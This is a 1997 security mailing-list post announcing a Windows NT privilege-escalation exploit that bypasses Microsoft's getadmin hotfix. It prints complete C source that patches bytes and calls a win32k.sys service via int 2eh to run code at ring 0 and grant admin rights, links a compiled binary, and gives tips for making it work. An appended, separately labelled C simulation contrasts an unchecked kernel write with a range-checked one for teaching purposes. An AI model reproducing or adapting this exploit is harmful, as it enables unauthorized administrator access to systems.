It's not over yet.

Aleph One (aleph1@DFW.NET)
Fri, 11 Jul 1997 03:45:18 -0500

From: Costin RAIU <craiu@gecad.ro>
Subject: [NTSEC] It's not over yet.

Hi everyone,

We all know Microsoft released the getadmin hotfix.
However, after a few hours of work, I was able to create a
new exploit which also works with this patch Microsoft just
released.

The problem is now in eax=4346 which is handled somewhere in
win32k.sys.
There are more (I found 4) vulnerable functions, but not as interesting
as this one. By calling the function in a special way, you can
get your own code executed at ring 0 privilege. My program will
simply change the byte of NtGlobalFlag to the DEBUG value, so you
can run GetAdmin (which after the fix is not working anymore).
Since compiling the source is very difficult, the compiled binary
is available at http://www.gecad.ro/~craiu/cr4.exe
This program was tested on 2 patched Windows NT machines, and worked
ok. (I got the Admin rights.)

Here's the source of my program:

/*

Run user code at ring 0
Author: Costin RAIU <craiu@gecad.ro>

*/
void* a[2];

void main(void) {
    int i;
    for (i=0;i<2;i++) a[i]=(void*)0;
    *(char*)(0x4080a4)=0x80; //or bptr [NtGlobalFlag+2],c1h
    *(char*)(0x4080a5)=0x0d;
    *(char*)(0x4080a6)=0xb6;
    *(char*)(0x4080a7)=0xc2;
    *(char*)(0x4080a8)=0x14;
    *(char*)(0x4080a9)=0x80;
    *(char*)(0x4080aa)=0xc1;
    *(char*)(0x4080ab)=0xcf;

    _asm
    {
        mov eax,4346
        mov edx,offset a
        int 2eh
    }
}

Due to the nature of this bug, it is very important that the address of
the mov eax,4346 instruction be 004080a4. I am not an
expert in the PE structure, but my cr4.exe program will always
run at that address on my test machine. An assembler version
might be very interesting, but there are other things to do
now (like checking eax=187). If any of you guys have better assembler
skills, I would like to see a nice asm version of my program.
OBJE: 4080a4 is somewhere in the program space, but it is not
used (debug info/data space etc...). You can probably control
the address of the retf (which, btw, is located at
a0020b87h).
After doing the "or" instruction, an IRETD is required to
continue the execution of the function, otherwise the kernel will
crash.

bye,
c0s

Costin RAIU, Data Security Expert

E-MAIL : BUSINESS mailto:craiu@gecad.ro, PERSONAL craiu@usa.net
PGP Key : http://www.gecad.ro/~craiu/craiu.asc (or search www.pgp.com)
KeyID : 2048/DD35A295 Costin RAIU <craiu@gecad.ro>
Key fingerprint = FD 14 2A 90 64 41 58 9A 6B 34 47 D8 C5 E2 F4 5C
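Added example, not from Costin's post and not Microsoft code. The post passes a user-mode array to a win32k.sys service in edx and gets ring-0 execution out of it; assuming the underlying bug class is a kernel service that trusts a caller-supplied pointer (the post does not state this directly), the C simulation below puts the unchecked pattern next to the ProbeForWrite-style range check that a kernel entry point should perform before touching memory the caller named. The flat 64 KiB "memory", the KERNEL_BASE split, SIM_FLAG_ADDR and every function name are assumptions of the simulation, not the NT memory map or win32k.sys internals.

```c
/* Constructed simulation of a kernel service that writes to a
 * caller-supplied address, once without and once with a user-range
 * check.  Memory layout and names are assumptions for the demo. */
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SIM_MEM_SIZE  0x10000u  /* simulated "physical" memory (assumed) */
#define KERNEL_BASE   0x8000u   /* simulated user/kernel split (assumed) */
#define SIM_FLAG_ADDR 0x9000u   /* a kernel-only byte, stand-in for a global flag */

static uint8_t sim_mem[SIM_MEM_SIZE];

/* Same contract as a ProbeForWrite-style check: the whole range
 * [addr, addr+len) must sit below KERNEL_BASE and must not wrap.
 * 64-bit arithmetic makes the end computation overflow-free.
 * Returns 0 when the range is acceptable, -1 otherwise. */
int probe_user_range(uint32_t addr, uint32_t len) {
    uint64_t end = (uint64_t)addr + (uint64_t)len;
    if (end > KERNEL_BASE) return -1;
    return 0;
}

/* Vulnerable pattern: the service trusts the destination it was handed.
 * The only bound here is the size of the simulation itself. */
int svc_fill_unchecked(uint32_t dst, uint32_t len, uint8_t fill) {
    if ((uint64_t)dst + (uint64_t)len > SIM_MEM_SIZE) return -1;
    memset(&sim_mem[dst], fill, len);
    return 0;
}

/* Hardened pattern: probe the caller's range before touching it and
 * fail with an access-violation style status (-2) when it reaches
 * kernel space. */
int svc_fill_checked(uint32_t dst, uint32_t len, uint8_t fill) {
    if (probe_user_range(dst, len) != 0) return -2;
    return svc_fill_unchecked(dst, len, fill);
}

uint8_t read_sim_byte(uint32_t addr) { return sim_mem[addr]; }
void reset_sim(void) { memset(sim_mem, 0, sizeof sim_mem); }

int main(void) {
    reset_sim();
    svc_fill_unchecked(SIM_FLAG_ADDR, 1, 0x80);
    printf("unchecked: kernel byte now 0x%02x\n", read_sim_byte(SIM_FLAG_ADDR));

    reset_sim();
    int rc = svc_fill_checked(SIM_FLAG_ADDR, 1, 0x80);
    printf("checked:   rc=%d, kernel byte still 0x%02x\n",
           rc, read_sim_byte(SIM_FLAG_ADDR));

    /* A range that starts in user space but runs into the kernel
     * is rejected too; the check is on the whole span, not the start. */
    printf("straddling range: rc=%d\n", svc_fill_checked(KERNEL_BASE - 1, 2, 0x41));
    return 0;
}
```

The point of the range check being on the full span (and on the wrapped end address) is that the simulated caller cannot satisfy it by handing over a start address that looks harmless; it is the same reason a real probe routine rejects both a kernel start address and a length that carries the end past the boundary.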